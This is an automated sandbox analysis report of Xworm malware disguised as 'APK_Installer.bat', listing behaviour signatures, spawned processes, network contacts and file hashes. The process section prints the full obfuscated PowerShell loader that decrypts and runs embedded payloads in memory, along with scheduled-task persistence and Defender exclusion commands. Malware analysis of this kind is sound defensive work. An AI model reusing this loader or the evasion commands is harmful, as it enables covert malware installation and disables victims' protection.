Analysis Overview
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
Threat Level: Known bad
The file APK_Installer.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Executes dropped EXE
Adds Run key to start application
Enumerates physical storage devices
Modifies data under HKEY_USERS
Enumerates system info in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-30 15:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 15:06
Reported
2024-05-30 15:08
Platform
win11-20240508-en
Max time kernel
122s
Max time network
121s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\Runtime Broker.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133615552154875824" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_837_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_837.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_837.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_837.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_837.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_837.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff0c24ab58,0x7fff0c24ab68,0x7fff0c24ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4152 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4292 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3988 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Users\Admin\Runtime Broker.exe
"C:\Users\Admin\Runtime Broker.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4624 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3296 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3436 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004D4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Users\Admin\Runtime Broker.exe
"C:\Users\Admin\Runtime Broker.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 19.ip.gl.ply.gg | udp |
| US | 147.185.221.19:38173 | 19.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.19:38173 | 19.ip.gl.ply.gg | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 104.77.118.105:443 | www.tiktok.com | tcp |
| GB | 104.77.118.105:443 | www.tiktok.com | tcp |
| BE | 2.17.198.128:443 | sf16-website-login.neutral.ttwstatic.com | tcp |
| BE | 2.17.198.128:443 | sf16-website-login.neutral.ttwstatic.com | tcp |
| BE | 2.17.198.128:443 | sf16-website-login.neutral.ttwstatic.com | tcp |
| BE | 2.17.198.128:443 | sf16-website-login.neutral.ttwstatic.com | tcp |
| BE | 2.17.198.128:443 | sf16-website-login.neutral.ttwstatic.com | tcp |
| BE | 2.17.198.128:443 | sf16-website-login.neutral.ttwstatic.com | tcp |
| BE | 2.17.198.128:443 | sf16-website-login.neutral.ttwstatic.com | tcp |
| US | 8.8.8.8:53 | mcs-va-useast2a.tiktokv.com | udp |
| BE | 2.17.197.240:443 | libraweb.tiktokw.eu | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
| GB | 139.177.227.225:443 | mon-i18n.tiktokv.com | tcp |
| GB | 139.177.227.225:443 | mon-i18n.tiktokv.com | tcp |
| US | 8.8.8.8:53 | p16-va.tiktokcdn.com | udp |
| US | 8.8.8.8:53 | s20.tiktokcdn.com | udp |
| US | 8.8.8.8:53 | v16.tiktokcdn.com | udp |
| BE | 2.17.198.179:443 | p16-sign-useast2a.tiktokcdn.com | tcp |
| BE | 2.17.198.179:443 | p16-sign-useast2a.tiktokcdn.com | tcp |
| BE | 104.117.77.65:443 | lf16-tiktok-common.ibytedtos.com | tcp |
| GB | 172.217.169.27:443 | storage.googleapis.com | tcp |
| GB | 172.217.169.27:443 | storage.googleapis.com | udp |
| BE | 104.117.77.65:443 | lf16-tiktok-common.ibytedtos.com | tcp |
| BE | 104.117.77.65:443 | lf16-tiktok-common.ibytedtos.com | tcp |
| BE | 104.117.77.65:443 | lf16-tiktok-common.ibytedtos.com | tcp |
| BE | 2.17.197.234:443 | mcs-ie.tiktokw.eu | tcp |
| BE | 2.17.197.210:443 | starling.tiktokv.eu | tcp |
| NL | 23.62.61.98:443 | webcast.tiktok.com | tcp |
| BE | 104.117.77.35:443 | v16-webapp.tiktok.com | tcp |
| BE | 2.17.198.139:443 | p16-sign-va.tiktokcdn.com | tcp |
| BE | 2.17.198.139:443 | p16-sign-va.tiktokcdn.com | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
| US | 8.8.8.8:53 | p16-sign.tiktokcdn-us.com | udp |
| US | 23.204.152.54:443 | p16-sign.tiktokcdn-us.com | tcp |
| GB | 84.17.50.39:443 | p77-sign-va-lite.tiktokcdn.com | tcp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | 54.152.204.23.in-addr.arpa | udp |
| BE | 104.117.77.26:443 | mon.tiktokv.com | tcp |
| GB | 104.77.118.105:443 | www.tiktok.com | tcp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| BE | 104.117.77.26:443 | mon.tiktokv.com | tcp |
| BE | 104.117.77.72:443 | sf16-sg.tiktokcdn.com | tcp |
| US | 151.101.190.73:443 | v19-webapp-prime.tiktok.com | tcp |
| US | 8.8.8.8:53 | 73.190.101.151.in-addr.arpa | udp |
| US | 147.185.221.19:38173 | 19.ip.gl.ply.gg | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
| GB | 104.77.118.137:443 | us.tiktok.com | tcp |
| NL | 23.62.61.89:443 | mcs-va-useast2a.tiktokv.com | tcp |
Files
memory/536-0-0x00007FFF13893000-0x00007FFF13895000-memory.dmp
memory/536-1-0x0000019CBD140000-0x0000019CBD162000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm0qjyeq.r1q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/536-10-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/536-11-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/536-12-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/536-13-0x0000019CBD3E0000-0x0000019CBD3E8000-memory.dmp
memory/536-14-0x0000019CBD3F0000-0x0000019CBD42A000-memory.dmp
memory/4940-16-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/4940-25-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/4940-26-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/4940-27-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
memory/4940-30-0x00007FFF13890000-0x00007FFF14352000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb15ee5741b379245ca8549cb0d4ecf8 |
| SHA1 | 3555273945abda3402674aea7a4bff65eb71a783 |
| SHA256 | b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636 |
| SHA512 | 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\startup_str_837.vbs
| MD5 | a299d6b6ae224adfb40548bab06b7ff9 |
| SHA1 | 74221fa5196465f9b258dcd4ddb39399c408cb20 |
| SHA256 | a4fe79eb3bf7afd34cb8d435306f15a9be15029e1616fba7443d4478607c37d6 |
| SHA512 | 83de95510fbb89c4b2f29050c8bfd88dfd3283440c371818da8a9d1e82a8a0cf1e2ea86f38bc4a3b18fc6ee491b85d7cbd6584a08c143efed148c5afdc06bd42 |
C:\Users\Admin\AppData\Roaming\startup_str_837.bat
| MD5 | 7a5f5944302b8298714b56ae2f138b7c |
| SHA1 | 669b42f2f6e76895899d84d5ad7a12f23d951f13 |
| SHA256 | 3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552 |
| SHA512 | 73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120 |
memory/3760-48-0x0000020C7C1F0000-0x0000020C7C20A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80707036df540b6657f9d443b449e3c3 |
| SHA1 | b3e7d5d97274942164bf93c8c4b8a9b68713f46f |
| SHA256 | 6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0 |
| SHA512 | 65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e47c3fa11e796c492a8388c946bf1636 |
| SHA1 | 4a090378f0db26c6f019c9203f5b27f12fa865c7 |
| SHA256 | 4bb861850395dcc3bec4691e8b9f0fa733b8a2d568d460a9201d65250b12fee1 |
